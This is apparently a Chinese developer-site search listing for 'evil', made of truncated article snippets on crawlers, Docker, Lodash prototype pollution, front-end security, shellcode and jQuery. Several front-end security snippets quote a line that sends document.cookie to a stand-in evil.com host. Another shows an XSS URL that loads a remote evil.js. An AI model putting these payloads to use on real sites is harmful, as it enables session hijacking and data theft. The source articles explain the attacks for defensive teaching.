Evil精品文章

• 

  Evil Python

  那些年我們寫(xiě)過(guò)的爬蟲(chóng) 從寫(xiě) nodejs 的第一個(gè)爬蟲(chóng)開(kāi)始陸陸續(xù)續(xù)寫(xiě)了好幾個(gè)爬蟲(chóng)，從爬拉勾網(wǎng)上的職位信息到爬豆瓣上的租房帖子，再到去爬知乎上的妹子照片什么的，爬蟲(chóng)為我打開(kāi)了一扇又一扇新世界的大門(mén)。除了漲了很多...

  Turbo 2019-07-30 15:07 評(píng)論0 收藏0
• 

  Docker鏡像提交命令commit的工作原理和使用方法

  ...網(wǎng)頁(yè)的位置： wget --no-check-certificate -O /usr/share/nginx/html/evil.jpg https://github.com/raw/slvi/docker-k8s-training/master/docker/res/evil.jpg wget --no-check-certificate -O /usr/share/nginx/html...

  susheng 2019-06-28 16:49 評(píng)論0 收藏0
• 

  最新：Lodash 嚴(yán)重安全漏洞背后你不得不知道的 JavaScript 知識(shí)

  ...cas} console.log(person.name) person.__proto__.toString = () => {alert(evil)} console.log(person.name) let person2 = {} console.log(person2.toString()) 這段代碼執(zhí)行將會(huì) alert 出 evil 文字。同時(shí) Object.proto...

  Integ 2019-08-23 18:37 評(píng)論0 收藏0
• 

  Lodash 嚴(yán)重安全漏洞背后 你不得不知道的 JavaScript 知識(shí)

  ...cas} console.log(person.name) person.__proto__.toString = () => {alert(evil)} console.log(person.name) let person2 = {} console.log(person2.toString()) 這段代碼執(zhí)行將會(huì) alert 出 evil 文字。同時(shí) Object.proto...

  YorkChen 2019-08-26 10:15 評(píng)論0 收藏0
• 

  淺談前端安全

  ...本中，避免直接在URL的參數(shù)里寫(xiě)入大量的Javascript代碼 在evil.js中，通過(guò)如下代碼竊取cookievar img = document.createElement(img); img.src = http://www.evil.com/log?+escape(document.cookie); document.body.appendChild(img); 以上代碼在頁(yè)面中...

  Cympros 2019-08-22 17:11 評(píng)論0 收藏0
• 

  淺談前端安全

  ...本中，避免直接在URL的參數(shù)里寫(xiě)入大量的Javascript代碼 在evil.js中，通過(guò)如下代碼竊取cookievar img = document.createElement(img); img.src = http://www.evil.com/log?+escape(document.cookie); document.body.appendChild(img); 以上代碼在頁(yè)面中...

  李世贊 2019-08-29 15:21 評(píng)論0 收藏0
• 

  淺談前端安全

  ...本中，避免直接在URL的參數(shù)里寫(xiě)入大量的Javascript代碼 在evil.js中，通過(guò)如下代碼竊取cookievar img = document.createElement(img); img.src = http://www.evil.com/log?+escape(document.cookie); document.body.appendChild(img); 以上代碼在頁(yè)面中...

  alexnevsky 2019-08-02 10:24 評(píng)論0 收藏0
• 

  使用C編譯器編寫(xiě)shellcode

  ...以直接內(nèi)嵌進(jìn)去，無(wú)需擔(dān)心數(shù)據(jù)的存放，比如:?WinExec(evil.exe)。這里的evil.exe字符串被存儲(chǔ)在C程序的靜態(tài)區(qū)域（很可能是二進(jìn)制的.rdata節(jié)中），如果我們把這段代碼拷貝出來(lái)，試圖將其注入到其他進(jìn)程中，就會(huì)因那段字...

  MasonEast 2019-06-21 16:19 評(píng)論0 收藏0
• 

  貨運(yùn)巨頭Forward Air報(bào)告勒索軟件數(shù)據(jù)泄露 損失金額達(dá)750萬(wàn)美元

  ...子數(shù)據(jù)接口。研究人員后來(lái)透露，這次攻擊很可能是由Evil Corp網(wǎng)絡(luò)犯罪團(tuán)伙的成員實(shí)施的，他們經(jīng)常使用不同的勒索軟件名稱(chēng)(例如 Hades)進(jìn)行攻擊，以逃避美國(guó)的制裁。當(dāng)時(shí)，多名Forward Air員工擔(dān)心這次攻擊會(huì)暴露他們的個(gè)人...

  vslam 2021-10-11 10:59 評(píng)論0 收藏0
• 

  jQuery設(shè)計(jì)思想之理解篇

  ...DOM元素： $(a).click(function(e) { if($(this).attr(href).match(evil)) { //如果確認(rèn)為有害鏈接 e.preventDefault(); //阻止打開(kāi) $(this).addClass(evil); //加上表示有害的class } }); 有兩種方法，可以自動(dòng)觸發(fā)一個(gè)事件...

  newsning 2019-08-20 16:12 評(píng)論0 收藏0
• 

  一個(gè)簡(jiǎn)單拉鉤網(wǎng)python爬蟲(chóng)

  前期準(zhǔn)備 Dont be evil！ 主要就是分析需要抓取的頁(yè)面，或許會(huì)有意外驚喜，直接找到獲取數(shù)據(jù)的接口。 首選打開(kāi)拉鉤網(wǎng)首頁(yè)，發(fā)現(xiàn)一個(gè)職位至少有一個(gè)一級(jí)分類(lèi)、二級(jí)分類(lèi)和一個(gè)標(biāo)簽。比如需要點(diǎn)擊查找Java相關(guān)的職位，需要...

  xumenger 2019-07-25 11:32 評(píng)論0 收藏0
• 

  javascript 的工具函數(shù)

  ... return JSON.parse(text); } else { /* jshint evil: true */ return new Function(return ( + text + );)(); } }; var whitespace = /(^[s xa...

  trilever 2019-08-19 18:01 評(píng)論0 收藏0
• 

  2017-09-15 前端日?qǐng)?bào)

  ...with Vue and LESS.Size Limit: Make the Web lighter — Martian Chronicles, Evil Martians’ team blogThe All-New Guide to CSS Support in Email

  glumes 2019-08-22 11:08 評(píng)論0 收藏0
• 

  js跨站腳本

  ...個(gè)腳本。 http://abc.com:8887/?%3Cscript%20src=%E2%80%9Chttps://1.com/evil.js%E2%80%9D%3E%3C/script%3E 這樣就完成了一次腳本的注入。會(huì)將其他站點(diǎn)的腳本，通過(guò)連接進(jìn)行注入?？梢詫?duì)該站點(diǎn)的內(nèi)容做任何的操作，以及讀取cookie，以及將數(shù)據(jù)發(fā)送回...

  LinkedME2016 2019-08-23 10:38 評(píng)論0 收藏0